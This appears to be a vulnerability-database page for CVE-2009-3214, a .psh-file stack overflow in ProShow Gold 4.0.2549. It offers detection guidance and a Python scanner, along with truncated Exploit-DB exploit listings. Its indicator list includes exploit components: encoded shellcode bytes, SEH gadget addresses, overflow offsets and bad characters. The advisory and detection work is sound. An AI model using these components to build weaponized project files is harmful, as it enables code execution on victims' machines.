CVE-2009-3214
Published 2009-09-16

Priority: P356 · Severity: critical · CVSS 2.0 base score: 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit available
EPSS: 30.79% (98.0th percentile)
Multiple stack-based buffer overflows in Photodex ProShow Gold 4.0.2549 allow remote attackers to execute arbitrary code via a crafted Slideshow project (.psh) file, related to the (1) cell[n].images[m].image and (2) cell[n].sound.file fields.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| photodex | proshow_gold | — | — |
Detection & IOCs (extracted from sources)

- command: `cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg`
- bytes: `\xeb\x18\x90\x90`
- bytes: `\x01\xa6\x14\xea`
- bytes: `\xEB\x06\x90\x90`
- bytes: `\xf9\x4c\x1a\x10`
- bytes: `0x101a4cf9`
- bytes: `\xda\xd1\xd9\x74\x24\xf4\x2b\xc9\xb1\x1e\xbd\x78\x41\xbf\x6f\x58\x83\xe8\xfc\x31\x68\x14\x03\x68\x6c\xa3\x4a\x93\x64\x67\xb5\x6c\x74\xe3\xf0\x50\xff\x8f\xff\xd0\xfe\x80\x8b\x6e\x18\xd4\xd3\x50\x19\x01\xa2\x1b\x2d\x5e\x34\xf2\x7c\xa0\xae\xa6\xfa\xe0\xa5\xb1\xc3\x2b\x48\xbf\x01\x40\xa7\x84\xd1\xb3\x4c\x8e\x3c\x30\x13\x54\xbf\xac\xca\x1f\xb3\x79\x98\x7f\xd7\x7c\x75\xf4\xfb\xf5\x88\xe0\x8a\x56\xaf\xf2\x4f\x39\x9e\x0c\x2f\x90\x84\x7b\xe9\x2c\xce\x3c\xf9\xc7\xa0\xa0\xac\x53\x28\xd1\x27\x9b\x2a\x21\x5d\x0c\x45\x52\x2b\xa8\xca\xfa\xb3\x4f\x7e\xf4\x94\x50\x98\x6a\x7b\xc3\x04\x6d`
- Malicious .psh files exploit the cell[n].images[m].image field with an oversized value (6120–6151 'A' bytes) to trigger a stack-based buffer overflow via SEH overwrite in ProShow Gold 4.0.2549.
- Detect .psh files where the cell[0].images[0].image field value length exceeds normal path lengths (e.g., >4000 bytes), indicating a buffer overflow attempt.
- The SEH overwrite exploit uses a p/p/r gadget at 0x01a614ea (all.dnt) or 0x101a4cf9 (if.dnt) in ProShow Gold 4.0.2549; look for these return addresses on the stack during crash analysis.
- Bad characters for payload encoding in this exploit are null byte, newline, and carriage return (\x00\x0a\x0d); payloads in .psh files will not contain these bytes.
- The exploit file header magic string 'Photodex(R) ProShow(TM) Show File Version=0' combined with an abnormally long cell[0].images[0].image value is a strong indicator of a weaponized .psh file.
- The SEH overwrite offset differs between exploit variants: 6120 bytes of junk in the corelanc0d3r PoC vs. 6151 bytes in the hack4love variant, and 4036 bytes in the Metasploit module; the Metasploit module targets a different p/p/r gadget (0x101a4cf9 in if.dnt) than the standalone PoCs (0x01a614ea in all.dnt).
- The Metasploit module uses EXITFUNC=process and DisablePayloadHandler=true by default, and requires the victim to manually open the crafted .psh file (no network vector).
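The two detection heuristics listed above (the `Photodex(R) ProShow(TM) Show File Version=0` magic string plus an abnormally long `cell[n].images[m].image` or `cell[n].sound.file` value) are easy to turn into a file scanner. The following is an added example written for this page, not code from any of the referenced exploits or from Photodex; it assumes the .psh body is line-oriented `key=value` text as the IOC lines show, uses the page's suggested 4000-byte threshold, and adds one extra check (control bytes inside a path value) as a second, independent indicator. The sample inputs are constructed here for testing.

```python
import re
from typing import List, Tuple

# Magic string, field names and the 4000-byte threshold come from the
# CVE-2009-3214 detection notes above.
PSH_MAGIC = b"Photodex(R) ProShow(TM) Show File Version=0"
MAX_PATH_LEN = 4000

# Matches the two fields named in the advisory: cell[n].images[m].image and
# cell[n].sound.file. Group 1 is everything after the first '='.
SUSPECT_FIELD = re.compile(
    rb"^cell\[\d+\]\.(?:images\[\d+\]\.image|sound\.file)=(.*)\Z", re.S
)


def scan_psh(data: bytes, max_len: int = MAX_PATH_LEN) -> List[Tuple[str, str]]:
    """Return (field, reason) findings for a .psh file body.

    An empty list means either "not a ProShow project file" or "nothing
    suspicious in the fields this check knows about".
    """
    findings: List[Tuple[str, str]] = []
    if not data.startswith(PSH_MAGIC):
        return findings  # not a .psh file; the heuristics do not apply

    # Both CRLF and LF line endings are accepted; the published exploits avoid
    # \x0a and \x0d inside the payload, so line splitting cannot be defeated
    # by them here.
    for line in re.split(rb"\r\n|\n", data):
        m = SUSPECT_FIELD.match(line)
        if not m:
            continue
        field = line.split(b"=", 1)[0].decode("ascii", "replace")
        value = m.group(1)

        # Heuristic 1 (from the advisory): a path far longer than any real path.
        if len(value) > max_len:
            findings.append((field, f"value length {len(value)} exceeds {max_len} bytes"))

        # Heuristic 2 (added here): a file path should not contain ASCII control
        # bytes; injected machine code almost always does.
        if any(b < 0x20 or b == 0x7F for b in value):
            findings.append((field, "value contains control bytes"))
    return findings


# Constructed samples for demonstration (not real project files).
BENIGN_PSH = (
    PSH_MAGIC
    + b"\r\ncell[0].images[0].image=Backgrounds/Abstract_02.jpg"
    + b"\r\ncell[0].sound.file=intro.mp3\r\n"
)
OVERSIZED_PSH = PSH_MAGIC + b"\r\ncell[0].images[0].image=" + b"A" * 6120 + b"\r\n"
CONTROL_BYTES_PSH = PSH_MAGIC + b"\ncell[1].sound.file=x\x01y\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PSH), ("oversized", OVERSIZED_PSH),
                         ("control-bytes", CONTROL_BYTES_PSH)):
        print(name, scan_psh(sample) or "clean")
```

To use it on disk, read each candidate file in binary mode and pass the bytes to `scan_psh`; a non-empty result is worth quarantining for manual review. The length threshold is deliberately a parameter so it can be lowered for environments whose media paths are known to be short.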
No detection rules found.
Exploit-DB
ProShow Gold 4.0.2549 - '.psh' Local Stack Buffer Overflow (Metasploit)
exploitdb · 2010-09-25
---
```ruby
##
# $Id: proshow_cellimage_bof.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.
An attacker must send the file to victim and the victim must open the file.
},
'License' => MSF_LICENSE,
'Author' => [ 'jduck' ],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-
```
Exploit-DB
ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow (SEH)
exploitdb · 2009-08-25
---
```perl
#!/usr/bin/perl
# by hack4love
# [email protected]
# ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH
##########################################################################
##http://files.photodex.com/release/psgold_40_2549.exe
##http://files.photodex.com/release/pspro_40_2549.exe
###########################################################################
##THIS EXPLOIT WORK SO GOOD FOR THE TWO PROGRAM############################
###########################################################################
##FIRST WAS BY corelanc0d3r################################################
###########################################################################
my $header="Photodex(R) Pr
```
Exploit-DB
Photodex ProShow Gold 4 (Windows XP SP3) - '.psh' Universal Buffer Overflow (SEH)
exploitdb · 2009-08-24
---
```text
#
# [+] Vulnerability : ProShow Gold 4 BOF
# [+] Detected by : Bkis - http://blog.bkis.com/?p=737
# [*] Sploit coded by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit coded on : August 20, 2009
# [*] Type : local
# [*] OS : Windows
# [*] Product : Photodex ProShow Gold
# [*] Versions affected : 4.0
# [*] Download link : http://www.photodex.com/downloads/go_proshowgold
# [*] -------------------------------------------------------------------------
# [*] Method : SEH - Universal
# [*] Tested on : Windows XP SP3 En
# [*] Greetz&Tx to : Saumil/SK
# [*] -------------------------------------------------------------------------
# MMMMM~.
# MMMMM?.
# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?.
```
Metasploit
ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549. An attacker must send the file to the victim, and the victim must open the file.
No writeups or analysis indexed.
References:
- http://blog.bkis.com/?p=737
- http://osvdb.org/57226
- http://secunia.com/advisories/36357
- http://www.securityfocus.com/archive/1/505957/100/0/threaded
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52606